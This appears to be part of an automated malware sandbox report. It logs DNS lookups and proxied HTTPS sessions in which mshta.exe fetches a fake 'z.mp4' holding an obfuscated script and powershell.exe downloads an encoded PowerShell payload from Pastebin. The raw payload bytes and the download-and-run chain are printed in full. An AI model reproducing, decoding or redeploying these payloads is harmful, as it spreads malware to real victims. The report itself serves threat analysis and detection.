                                                                                                  Dec 17, 2024 08:48:25.398355961 CET1.1.1.1192.168.2.50x72a1No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:29.660840988 CET1.1.1.1192.168.2.50xe1d9No error (0)berb.fitnessclub-filmfanatics.com104.21.66.20A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:29.660840988 CET1.1.1.1192.168.2.50xe1d9No error (0)berb.fitnessclub-filmfanatics.com172.67.155.79A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • cndef1.green-pathways.shop
                                                                                                  • pastebin.com
                                                                                                  • www.360.net
                                                                                                  • www.baidu.com
                                                                                                  • berb.fitnessclub-filmfanatics.com

                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549704104.21.83.2294435416C:\Windows\System32\mshta.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-17 07:48:05 UTC343OUTGET /api/reg/z.mp4 HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-CH
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                  Host: cndef1.green-pathways.shop
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-17 07:48:06 UTC884INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 17 Dec 2024 07:48:05 GMT
                                                                                                  Content-Type: video/mp4
                                                                                                  Content-Length: 397568
                                                                                                  Connection: close
                                                                                                  Last-Modified: Thu, 28 Nov 2024 19:47:59 GMT
                                                                                                  ETag: "6748c8ef-61100"
                                                                                                  Accept-Ranges: bytes
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6oTQMFWA9peteqdayNSxuFeAETuHNEM6L%2BlQzzgxOUalteMJqYJDXMIm3G%2FWF087PV%2BXBJ2zI0wQwx6N2WdaBcU4FhSrf0tjlopuUCX1NOT8P16y7lTRiVFj%2FTjpu8%2FYY66aMlL7ZX%2FY3hljKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f354f0fe8fa42b1-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2138&min_rtt=2126&rtt_var=822&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=925&delivery_rate=1310592&cwnd=211&unsent_bytes=0&cid=60edf534014a9f01&ts=681&x=0"
                                                                                                  2024-12-17 07:48:06 UTC485INData Raw: 36 36 65 37 35 57 36 65 61 36 33 4f 37 34 5a 36 39 74 36 66 49 36 65 54 32 30 54 36 62 64 34 37 45 36 32 63 34 32 66 34 62 6e 32 38 49 35 38 69 34 62 71 36 34 77 36 35 70 34 64 42 34 38 67 32 39 48 37 62 61 37 36 46 36 31 5a 37 32 6b 32 30 49 36 66 58 35 33 79 37 37 63 35 30 4e 36 34 56 34 66 4f 33 64 59 32 30 52 32 37 74 32 37 44 33 62 7a 36 36 62 36 66 45 37 32 56 32 30 54 32 38 41 37 36 4f 36 31 54 37 32 69 32 30 79 34 31 72 37 39 45 36 34 5a 36 65 4a 35 34 71 37 32 7a 32 30 59 33 64 4d 32 30 58 33 30 77 33 62 56 34 31 6f 37 39 6f 36 34 6c 36 65 6b 35 34 56 37 32 71 32 30 50 33 63 69 32 30 4e 35 38 47 34 62 56 36 34 50 36 35 66 34 64 71 34 38 56 32 65 6c 36 63 67 36 35 4d 36 65 47 36 37 4d 37 34 6c 36 38 72 33 62 6d 32 30 52 34 31 54 37 39 59 36 34 54
                                                                                                  Data Ascii: 66e75W6ea63O74Z69t6fI6eT20T6bd47E62c42f4bn28I58i4bq64w65p4dB48g29H7ba76F61Z72k20I6fX53y77c50N64V4fO3dY20R27t27D3bz66b6fE72V20T28A76O61T72i20y41r79E64Z6eJ54q72z20Y3dM20X30w3bV41o79o64l6ek54V72q20P3ci20N58G4bV64P65f4dq48V2el6cg65M6eG67M74l68r3bm20R41T79Y64T
                                                                                                  2024-12-17 07:48:06 UTC1369INData Raw: 6d 32 62 76 32 30 77 37 61 6c 36 65 54 37 30 57 36 31 6b 37 34 5a 37 64 48 37 32 59 36 35 6d 37 34 52 37 35 58 37 32 71 36 65 45 32 30 5a 36 66 68 35 33 77 37 37 45 35 30 42 36 34 53 34 66 78 37 64 54 33 62 62 37 36 4d 36 31 4c 37 32 49 32 30 62 36 66 62 35 33 77 37 37 41 35 30 48 36 34 68 34 66 4f 32 30 50 33 64 4d 32 30 42 36 62 61 34 37 4b 36 32 72 34 32 4d 34 62 6f 32 38 64 35 62 5a 33 32 68 33 38 6b 33 30 4f 32 63 50 33 32 54 33 37 57 33 39 51 32 63 78 33 32 53 33 38 76 33 37 55 32 63 70 33 32 63 33 36 56 33 39 5a 32 63 48 33 32 4e 33 38 4a 33 32 79 32 63 4c 33 32 58 33 38 65 33 33 6b 32 63 4a 33 32 61 33 37 73 33 32 59 32 63 47 33 32 6d 33 36 4e 33 39 6f 32 63 65 33 32 55 33 37 74 33 36 74 32 63 62 33 32 77 33 37 73 33 36 48 32 63 45 33 32 66 33 31
                                                                                                  Data Ascii: m2bv20w7al6eT70W61k74Z7dH72Y65m74R75X72q6eE20Z6fh53w77E50B64S4fx7dT3bb76M61L72I20b6fb53w77A50H64h4fO20P3dM20B6ba47K62r42M4bo28d5bZ32h38k30O2cP32T37W39Q2cx32S38v37U2cp32c36V39Z2cH32N38J32y2cL32X38e33k2cJ32a37s32Y2cG32m36N39o2ce32U37t36t2cb32w37s36H2cE32f31
                                                                                                  2024-12-17 07:48:06 UTC1369INData Raw: 33 38 54 33 38 73 32 63 51 33 32 6c 33 30 6d 33 34 43 32 63 49 33 32 6e 33 30 4e 33 36 63 32 63 64 33 32 5a 33 30 64 33 30 76 32 63 66 33 32 46 33 30 63 33 37 6d 32 63 53 33 32 49 33 30 78 33 39 66 32 63 6f 33 32 4d 33 39 4b 33 33 45 32 63 4e 33 32 49 33 32 52 33 37 76 32 63 47 33 32 56 33 30 66 33 34 4c 32 63 72 33 32 70 33 37 42 33 37 78 32 63 53 33 32 59 33 36 48 33 36 57 32 63 62 33 32 4a 33 36 45 33 35 67 32 63 77 33 32 4e 33 34 6e 33 37 44 32 63 52 33 32 44 33 30 4c 33 30 7a 32 63 68 33 32 6e 33 32 45 33 39 45 32 63 62 33 32 68 33 30 70 33 30 7a 32 63 56 33 32 52 33 33 56 33 37 48 32 63 75 33 32 52 33 37 44 33 32 71 32 63 44 33 32 65 33 34 55 33 36 75 32 63 42 33 32 61 33 37 44 33 39 65 32 63 49 33 32 65 33 30 49 33 38 41 32 63 55 33 32 4e 33 30 65
                                                                                                  Data Ascii: 38T38s2cQ32l30m34C2cI32n30N36c2cd32Z30d30v2cf32F30c37m2cS32I30x39f2co32M39K33E2cN32I32R37v2cG32V30f34L2cr32p37B37x2cS32Y36H36W2cb32J36E35g2cw32N34n37D2cR32D30L30z2ch32n32E39E2cb32h30p30z2cV32R33V37H2cu32R37D32q2cD32e34U36u2cB32a37D39e2cI32e30I38A2cU32N30e
                                                                                                  2024-12-17 07:48:06 UTC1369INData Raw: 31 52 33 38 59 32 63 48 33 32 52 33 31 76 33 36 48 32 63 6b 33 32 54 33 31 76 33 37 50 32 63 54 33 32 68 33 33 64 33 35 4f 32 63 6b 33 32 62 33 33 70 33 34 53 32 63 71 33 32 66 33 33 65 33 33 7a 32 63 53 33 32 61 33 33 56 33 37 71 32 63 43 33 32 6a 33 32 50 33 30 5a 32 63 6b 33 32 75 33 33 4d 33 35 52 32 63 64 33 32 42 33 31 74 33 36 74 32 63 78 33 32 77 33 33 6e 33 37 4c 32 63 67 33 32 64 33 31 48 33 36 71 32 63 49 33 32 46 33 32 72 33 33 48 32 63 43 33 32 76 33 32 6b 33 34 4c 32 63 59 33 32 52 33 33 47 33 33 67 32 63 76 33 32 45 33 31 45 33 36 41 32 63 45 33 32 56 33 32 65 33 34 59 32 63 55 33 32 4c 33 32 6b 33 30 6a 32 63 68 33 32 77 33 33 55 33 38 74 32 63 72 33 32 54 33 33 54 33 37 6f 32 63 54 33 32 65 33 33 69 33 33 77 32 63 73 33 32 48 33 33 58 33
                                                                                                  Data Ascii: 1R38Y2cH32R31v36H2ck32T31v37P2cT32h33d35O2ck32b33p34S2cq32f33e33z2cS32a33V37q2cC32j32P30Z2ck32u33M35R2cd32B31t36t2cx32w33n37L2cg32d31H36q2cI32F32r33H2cC32v32k34L2cY32R33G33g2cv32E31E36A2cE32V32e34Y2cU32L32k30j2ch32w33U38t2cr32T33T37o2cT32e33i33w2cs32H33X3
                                                                                                  2024-12-17 07:48:06 UTC1369INData Raw: 42 33 37 49 32 63 6a 33 32 44 33 31 47 33 39 67 32 63 76 33 32 56 33 31 44 33 36 6f 32 63 56 33 32 75 33 31 66 33 38 71 32 63 72 33 32 42 33 32 4e 33 32 6c 32 63 6a 33 32 64 33 33 50 33 35 79 32 63 4e 33 32 45 33 31 7a 33 37 6d 32 63 47 33 32 4a 33 32 4d 33 31 51 32 63 62 33 32 48 33 31 56 33 39 49 32 63 6f 33 32 73 33 31 54 33 39 6f 32 63 7a 33 32 7a 33 32 68 33 34 44 32 63 63 33 32 77 33 32 56 33 34 42 32 63 73 33 32 43 33 32 45 33 30 6e 32 63 62 33 32 43 33 32 6e 33 34 66 32 63 74 33 32 43 33 32 75 33 31 65 32 63 45 33 32 54 33 33 5a 33 38 6d 32 63 4a 33 32 6d 33 33 4d 33 36 4f 32 63 5a 33 32 58 33 33 43 33 38 79 32 63 68 33 32 5a 33 31 6c 33 37 6b 32 63 77 33 32 4c 33 33 56 33 33 52 32 63 69 33 32 78 33 33 75 33 35 45 32 63 45 33 32 59 33 31 6f 33 39
                                                                                                  Data Ascii: B37I2cj32D31G39g2cv32V31D36o2cV32u31f38q2cr32B32N32l2cj32d33P35y2cN32E31z37m2cG32J32M31Q2cb32H31V39I2co32s31T39o2cz32z32h34D2cc32w32V34B2cs32C32E30n2cb32C32n34f2ct32C32u31e2cE32T33Z38m2cJ32m33M36O2cZ32X33C38y2ch32Z31l37k2cw32L33V33R2ci32x33u35E2cE32Y31o39
                                                                                                  2024-12-17 07:48:06 UTC1369INData Raw: 33 34 62 32 63 6b 33 32 56 33 33 53 33 36 51 32 63 42 33 32 41 33 33 43 33 33 54 32 63 68 33 32 50 33 33 77 33 38 74 32 63 71 33 32 42 33 32 57 33 33 75 32 63 66 33 32 67 33 31 4a 33 38 6e 32 63 74 33 32 55 33 31 75 33 38 6b 32 63 42 33 32 72 33 32 46 33 35 77 32 63 43 33 32 52 33 33 41 33 36 70 32 63 7a 33 32 51 33 32 4d 33 35 69 32 63 41 33 32 47 33 33 4a 33 38 43 32 63 68 33 32 45 33 33 4f 33 33 50 32 63 71 33 32 4f 33 33 66 33 37 6e 32 63 4e 33 32 4a 33 31 74 33 38 51 32 63 71 33 32 4d 33 32 68 33 32 50 32 63 62 33 32 69 33 33 4f 33 38 4b 32 63 75 33 32 46 33 33 52 33 35 51 32 63 50 33 32 48 33 31 75 33 38 61 32 63 70 33 32 6e 33 32 75 33 33 5a 32 63 57 33 32 48 33 33 47 33 38 70 32 63 47 33 32 65 33 32 74 33 31 6d 32 63 4c 33 32 52 33 33 6a 33 34 73
                                                                                                  Data Ascii: 34b2ck32V33S36Q2cB32A33C33T2ch32P33w38t2cq32B32W33u2cf32g31J38n2ct32U31u38k2cB32r32F35w2cC32R33A36p2cz32Q32M35i2cA32G33J38C2ch32E33O33P2cq32O33f37n2cN32J31t38Q2cq32M32h32P2cb32i33O38K2cu32F33R35Q2cP32H31u38a2cp32n32u33Z2cW32H33G38p2cG32e32t31m2cL32R33j34s
                                                                                                  2024-12-17 07:48:06 UTC1369INData Raw: 37 57 32 63 44 33 32 65 33 32 72 33 33 52 32 63 56 33 32 4e 33 31 47 33 36 6c 32 63 63 33 32 58 33 31 65 33 36 65 32 63 69 33 32 4e 33 31 43 33 39 68 32 63 6f 33 32 75 33 33 6f 33 34 59 32 63 55 33 32 43 33 32 4a 33 33 70 32 63 66 33 32 4c 33 33 41 33 38 71 32 63 56 33 32 4e 33 33 64 33 33 54 32 63 42 33 32 6f 33 32 4d 33 35 65 32 63 46 33 32 7a 33 33 6e 33 34 50 32 63 6a 33 32 56 33 32 50 33 31 44 32 63 6f 33 32 47 33 32 46 33 34 76 32 63 43 33 32 76 33 33 57 33 34 51 32 63 61 33 32 78 33 31 42 33 39 42 32 63 56 33 32 43 33 32 6d 33 34 4b 32 63 4d 33 32 51 33 32 50 33 30 4f 32 63 75 33 32 4c 33 32 63 33 35 75 32 63 42 33 32 58 33 31 62 33 36 6f 32 63 47 33 32 59 33 33 70 33 34 7a 32 63 6e 33 32 46 33 32 42 33 32 5a 32 63 47 33 32 45 33 33 6e 33 38 61 32
                                                                                                  Data Ascii: 7W2cD32e32r33R2cV32N31G36l2cc32X31e36e2ci32N31C39h2co32u33o34Y2cU32C32J33p2cf32L33A38q2cV32N33d33T2cB32o32M35e2cF32z33n34P2cj32V32P31D2co32G32F34v2cC32v33W34Q2ca32x31B39B2cV32C32m34K2cM32Q32P30O2cu32L32c35u2cB32X31b36o2cG32Y33p34z2cn32F32B32Z2cG32E33n38a2
                                                                                                  2024-12-17 07:48:06 UTC1369INData Raw: 4b 32 63 42 33 32 48 33 32 45 33 35 66 32 63 56 33 32 6a 33 33 5a 33 36 56 32 63 42 33 32 6a 33 33 79 33 34 78 32 63 47 33 32 76 33 32 65 33 34 64 32 63 47 33 32 74 33 32 75 33 35 6c 32 63 4a 33 32 42 33 33 41 33 34 45 32 63 47 33 32 59 33 33 62 33 35 70 32 63 58 33 32 6a 33 32 59 33 33 6d 32 63 6d 33 32 55 33 31 56 33 38 48 32 63 73 33 32 44 33 33 72 33 36 77 32 63 72 33 32 4c 33 31 51 33 37 41 32 63 72 33 32 55 33 31 4f 33 37 7a 32 63 6e 33 32 4c 33 33 64 33 33 6a 32 63 7a 33 32 63 33 31 41 33 37 41 32 63 48 33 32 7a 33 31 5a 33 37 78 32 63 48 33 32 6b 33 32 79 33 32 53 32 63 4c 33 32 4d 33 32 4c 33 31 6c 32 63 5a 33 32 58 33 31 6b 33 38 43 32 63 42 33 32 79 33 33 74 33 37 78 32 63 6b 33 32 7a 33 33 4e 33 38 6c 32 63 4a 33 32 63 33 32 43 33 30 4d 32 63
                                                                                                  Data Ascii: K2cB32H32E35f2cV32j33Z36V2cB32j33y34x2cG32v32e34d2cG32t32u35l2cJ32B33A34E2cG32Y33b35p2cX32j32Y33m2cm32U31V38H2cs32D33r36w2cr32L31Q37A2cr32U31O37z2cn32L33d33j2cz32c31A37A2cH32z31Z37x2cH32k32y32S2cL32M32L31l2cZ32X31k38C2cB32y33t37x2ck32z33N38l2cJ32c32C30M2c
                                                                                                  2024-12-17 07:48:06 UTC1369INData Raw: 32 63 6d 33 32 44 33 31 59 33 36 5a 32 63 70 33 32 65 33 32 4a 33 35 6a 32 63 43 33 32 63 33 32 59 33 34 69 32 63 76 33 32 5a 33 32 48 33 30 46 32 63 4d 33 32 63 33 32 55 33 34 4e 32 63 58 33 32 49 33 33 6d 33 38 50 32 63 4c 33 32 7a 33 33 68 33 35 57 32 63 72 33 32 61 33 31 55 33 36 57 32 63 51 33 32 55 33 33 68 33 34 49 32 63 51 33 32 69 33 32 50 33 34 49 32 63 74 33 32 79 33 32 72 33 33 47 32 63 64 33 32 6b 33 33 57 33 35 69 32 63 46 33 32 6e 33 31 4d 33 37 74 32 63 74 33 32 66 33 32 67 33 32 65 32 63 51 33 32 4a 33 32 4f 33 34 71 32 63 77 33 32 6d 33 31 73 33 38 62 32 63 49 33 32 43 33 33 52 33 34 61 32 63 72 33 32 7a 33 33 6f 33 36 65 32 63 4e 33 32 4d 33 32 54 33 30 59 32 63 52 33 32 66 33 31 6d 33 36 61 32 63 63 33 32 79 33 32 52 33 32 44 32 63 4f
                                                                                                  Data Ascii: 2cm32D31Y36Z2cp32e32J35j2cC32c32Y34i2cv32Z32H30F2cM32c32U34N2cX32I33m38P2cL32z33h35W2cr32a31U36W2cQ32U33h34I2cQ32i32P34I2ct32y32r33G2cd32k33W35i2cF32n31M37t2ct32f32g32e2cQ32J32O34q2cw32m31s38b2cI32C33R34a2cr32z33o36e2cN32M32T30Y2cR32f31m36a2cc32y32R32D2cO
                                                                                                  2024-12-17 07:48:06 UTC1369INData Raw: 63 49 33 32 44 33 33 6f 33 37 6e 32 63 66 33 32 43 33 31 78 33 39 50 32 63 51 33 32 70 33 33 69 33 36 41 32 63 45 33 32 70 33 33 6e 33 35 52 32 63 56 33 32 47 33 32 4a 33 34 76 32 63 5a 33 32 70 33 33 79 33 35 4e 32 63 68 33 32 56 33 33 48 33 33 46 32 63 45 33 32 74 33 33 74 33 35 51 32 63 62 33 32 6a 33 32 53 33 32 6e 32 63 6c 33 32 67 33 32 49 33 34 41 32 63 49 33 32 73 33 33 51 33 38 71 32 63 56 33 32 41 33 33 50 33 37 6a 32 63 73 33 32 69 33 32 44 33 30 58 32 63 71 33 32 6d 33 33 6b 33 35 54 32 63 46 33 32 62 33 32 46 33 34 4a 32 63 75 33 32 72 33 33 4b 33 37 58 32 63 77 33 32 53 33 32 59 33 33 55 32 63 58 33 32 7a 33 31 66 33 39 70 32 63 79 33 32 49 33 33 6d 33 36 68 32 63 5a 33 32 48 33 32 72 33 30 67 32 63 46 33 32 59 33 33 4d 33 33 57 32 63 70 33
                                                                                                  Data Ascii: cI32D33o37n2cf32C31x39P2cQ32p33i36A2cE32p33n35R2cV32G32J34v2cZ32p33y35N2ch32V33H33F2cE32t33t35Q2cb32j32S32n2cl32g32I34A2cI32s33Q38q2cV32A33P37j2cs32i32D30X2cq32m33k35T2cF32b32F34J2cu32r33K37X2cw32S32Y33U2cX32z31f39p2cy32I33m36h2cZ32H32r30g2cF32Y33M33W2cp3


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.549708172.67.19.244436568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-17 07:48:11 UTC169OUTGET /raw/0v6Vhvpb HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                  Host: pastebin.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-17 07:48:12 UTC388INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 17 Dec 2024 07:48:12 GMT
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  x-frame-options: DENY
                                                                                                  x-content-type-options: nosniff
                                                                                                  x-xss-protection: 1;mode=block
                                                                                                  cache-control: public, max-age=1801
                                                                                                  CF-Cache-Status: MISS
                                                                                                  Last-Modified: Tue, 17 Dec 2024 07:48:12 GMT
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f354f370e9e32ca-EWR
                                                                                                  2024-12-17 07:48:12 UTC981INData Raw: 32 38 36 36 0d 0a 24 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 3d 20 40 22 0d 0a 50 70 75 49 6b 36 76 54 2c 66 77 31 39 32 5a 43 67 2c 76 44 78 78 4c 54 7a 2f 2c 30 50 43 4a 44 69 43 61 2c 56 64 69 63 61 4b 43 44 2c 76 4d 6b 5a 73 56 65 44 2c 0d 0a 4b 51 50 44 54 45 6a 52 2c 78 75 47 63 32 78 63 55 2c 6e 68 76 61 53 5a 58 76 2c 45 44 32 42 6a 5a 38 65 2c 53 74 5a 39 6c 69 35 55 2c 67 2b 43 75 4f 39 45 6c 2c 0d 0a 68 47 33 6e 54 62 37 63 2c 64 4e 6c 36 42 2b 59 56 2c 78 4b 36 42 42 2f 75 6b 2c 73 37 32 78 78 4d 41 47 2c 67 7a 55 4e 61 6f 65 55 2c 73 47 6c 4c 4f 5a 73 2b 2c 0d 0a 48 56 4c 6f 4e 54 45 72 2c 6e 65 6c 71 34 57 52 79 2c 72 48 30 6b 74 71 67 39 2c 30 38 51 48 74 63 6f 46 2c 44 64 6e
                                                                                                  Data Ascii: 2866$AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = @"PpuIk6vT,fw192ZCg,vDxxLTz/,0PCJDiCa,VdicaKCD,vMkZsVeD,KQPDTEjR,xuGc2xcU,nhvaSZXv,ED2BjZ8e,StZ9li5U,g+CuO9El,hG3nTb7c,dNl6B+YV,xK6BB/uk,s72xxMAG,gzUNaoeU,sGlLOZs+,HVLoNTEr,nelq4WRy,rH0ktqg9,08QHtcoF,Ddn
                                                                                                  2024-12-17 07:48:12 UTC1369INData Raw: 34 46 4d 77 2b 38 6b 2c 77 6e 49 77 74 6e 64 74 2c 0d 0a 38 44 6d 36 4f 79 70 2b 2c 61 71 5a 6d 6a 4b 34 32 2c 71 38 53 56 5a 59 62 6f 2c 68 4c 44 61 2b 51 4d 4e 2c 72 31 4e 6d 50 42 75 73 2c 67 56 4f 2f 2b 66 35 7a 2c 0d 0a 6b 34 54 62 4a 75 75 30 2c 51 71 4e 68 52 45 50 34 2c 32 57 67 72 38 34 4a 50 2c 44 63 39 64 57 6b 53 57 2c 45 68 71 46 68 6e 58 43 2c 6b 44 6e 51 65 67 54 55 2c 0d 0a 73 45 73 64 52 6b 48 4c 2c 76 79 42 42 58 36 50 45 2c 31 5a 49 6c 30 57 57 71 2c 39 63 33 65 70 70 54 34 2c 50 58 76 59 46 4d 59 72 2c 35 6e 61 44 71 56 55 2f 2c 0d 0a 6f 31 33 34 42 35 69 33 2c 68 4e 31 45 52 43 67 34 2c 48 57 67 33 30 43 48 73 2c 61 49 35 4d 43 41 58 5a 2c 59 68 6f 47 38 6c 53 35 2c 32 4a 4f 35 49 59 51 79 2c 0d 0a 6a 32 42 72 7a 35 64 30 2c 6d 2f 36
                                                                                                  Data Ascii: 4FMw+8k,wnIwtndt,8Dm6Oyp+,aqZmjK42,q8SVZYbo,hLDa+QMN,r1NmPBus,gVO/+f5z,k4TbJuu0,QqNhREP4,2Wgr84JP,Dc9dWkSW,EhqFhnXC,kDnQegTU,sEsdRkHL,vyBBX6PE,1ZIl0WWq,9c3eppT4,PXvYFMYr,5naDqVU/,o134B5i3,hN1ERCg4,HWg30CHs,aI5MCAXZ,YhoG8lS5,2JO5IYQy,j2Brz5d0,m/6
                                                                                                  2024-12-17 07:48:12 UTC1369INData Raw: 4c 72 2c 71 69 33 65 78 32 65 6d 2c 4e 46 7a 58 38 4d 72 44 2c 75 56 69 6c 61 64 34 32 2c 35 6e 32 64 49 4f 57 35 2c 77 41 4a 51 41 2b 65 61 2c 0d 0a 4b 45 71 54 52 39 66 50 2c 4f 64 6b 50 77 38 79 44 2c 71 33 52 6c 58 4c 4e 4b 2c 70 34 78 48 52 79 6b 57 2c 46 79 64 51 67 4a 4d 32 2c 55 4d 54 4e 30 49 31 38 2c 0d 0a 61 43 42 72 50 54 39 43 2c 35 7a 7a 4b 65 32 39 31 2c 61 31 62 6d 4f 64 39 73 2c 4f 31 48 6e 33 48 55 4e 2c 30 50 32 62 50 54 38 45 2c 64 36 74 6e 71 66 32 39 2c 0d 0a 4f 56 77 4d 61 4e 71 62 2c 69 6d 72 34 77 4f 6b 33 2c 5a 64 48 47 43 62 6a 58 2c 30 47 35 6f 4f 41 76 56 2c 65 41 38 59 39 64 59 45 2c 79 2f 43 6f 6f 68 69 74 2c 0d 0a 31 75 65 30 51 45 68 66 2c 4d 54 77 68 6e 30 59 66 2c 53 77 61 38 78 78 6d 30 2c 32 73 75 44 6e 46 77 75 2c 68
                                                                                                  Data Ascii: Lr,qi3ex2em,NFzX8MrD,uVilad42,5n2dIOW5,wAJQA+ea,KEqTR9fP,OdkPw8yD,q3RlXLNK,p4xHRykW,FydQgJM2,UMTN0I18,aCBrPT9C,5zzKe291,a1bmOd9s,O1Hn3HUN,0P2bPT8E,d6tnqf29,OVwMaNqb,imr4wOk3,ZdHGCbjX,0G5oOAvV,eA8Y9dYE,y/Coohit,1ue0QEhf,MTwhn0Yf,Swa8xxm0,2suDnFwu,h
                                                                                                  2024-12-17 07:48:12 UTC1369INData Raw: 79 70 45 30 2c 62 6f 36 69 45 36 4e 2f 2c 75 44 64 62 7a 65 4a 74 2c 0d 0a 37 6b 47 74 66 4f 30 48 2c 57 49 6b 6c 4d 35 56 55 2c 5a 30 32 6d 32 78 46 49 2c 72 6d 58 35 59 56 57 59 2c 64 72 74 64 71 47 61 69 2c 68 39 4f 64 6f 71 51 52 2c 0d 0a 34 59 39 6b 62 4f 2b 70 2c 39 43 68 78 56 2b 71 55 2c 62 41 68 45 52 47 49 61 2c 70 34 6e 78 74 35 33 36 2c 78 61 39 39 48 61 47 33 2c 68 65 68 65 4c 37 41 68 2c 0d 0a 4b 38 66 4a 70 5a 33 5a 2c 4a 58 68 48 43 5a 55 2b 2c 48 42 4e 64 43 2b 54 32 2c 6a 6d 30 59 32 68 75 54 2c 67 4d 35 48 61 75 69 62 2c 2b 56 59 41 57 42 45 51 2c 0d 0a 36 76 42 32 4b 33 30 47 2c 47 68 33 6f 75 79 77 30 2c 76 31 4c 6a 34 72 6e 41 2c 61 4d 31 66 50 4d 30 38 2c 50 4e 4f 76 63 4f 79 68 2c 62 69 56 47 67 6b 53 44 2c 0d 0a 6e 67 6c 4c 63 72
                                                                                                  Data Ascii: ypE0,bo6iE6N/,uDdbzeJt,7kGtfO0H,WIklM5VU,Z02m2xFI,rmX5YVWY,drtdqGai,h9OdoqQR,4Y9kbO+p,9ChxV+qU,bAhERGIa,p4nxt536,xa99HaG3,heheL7Ah,K8fJpZ3Z,JXhHCZU+,HBNdC+T2,jm0Y2huT,gM5Hauib,+VYAWBEQ,6vB2K30G,Gh3ouyw0,v1Lj4rnA,aM1fPM08,PNOvcOyh,biVGgkSD,nglLcr
                                                                                                  2024-12-17 07:48:12 UTC1369INData Raw: 35 55 47 48 63 4a 5a 37 2c 57 31 52 32 65 34 61 76 2c 46 32 53 66 74 41 4f 54 2c 58 36 5a 77 63 74 58 67 2c 6c 71 69 45 4f 33 73 63 2c 31 38 4e 56 4a 7a 58 68 2c 0d 0a 49 5a 4c 5a 6c 6c 31 6e 2c 38 71 7a 6e 6b 44 77 44 2c 6e 36 7a 33 64 57 2b 4e 2c 41 33 59 6c 55 2f 2f 6e 2c 54 4c 74 31 56 47 7a 31 2c 49 4c 30 64 6e 65 69 42 2c 0d 0a 31 6b 6d 58 45 35 49 6f 2c 34 43 49 37 54 33 77 43 2c 42 68 69 30 4e 73 41 2f 2c 64 79 62 6d 6f 7a 6a 63 2c 4f 2f 57 36 47 4b 6b 54 2c 66 75 65 31 39 32 61 61 2c 0d 0a 70 36 6c 4a 61 52 76 4c 2c 7a 52 56 68 35 42 33 6d 2c 47 35 7a 4c 4d 33 39 2f 2c 4c 2f 4e 45 70 37 6a 53 2c 78 76 5a 77 30 5a 2f 38 2c 4e 61 6a 74 4b 41 46 47 2c 0d 0a 50 47 62 6d 6c 61 41 33 2c 57 43 6b 34 4c 61 73 50 2c 34 4d 7a 64 73 4e 38 45 2c 4c 4e 6f 75
                                                                                                  Data Ascii: 5UGHcJZ7,W1R2e4av,F2SftAOT,X6ZwctXg,lqiEO3sc,18NVJzXh,IZLZll1n,8qznkDwD,n6z3dW+N,A3YlU//n,TLt1VGz1,IL0dneiB,1kmXE5Io,4CI7T3wC,Bhi0NsA/,dybmozjc,O/W6GKkT,fue192aa,p6lJaRvL,zRVh5B3m,G5zLM39/,L/NEp7jS,xvZw0Z/8,NajtKAFG,PGbmlaA3,WCk4LasP,4MzdsN8E,LNou
                                                                                                  2024-12-17 07:48:12 UTC1369INData Raw: 7b 0d 0a 20 20 20 20 20 20 20 20 24 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 20 3d 20 28 24 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 20 2b 20 24 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 5b 24 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 5d 20 2b 20 24 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 5b 24 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 20 25 20 24 46 46 46 46 46 46 46 46 46 46 46
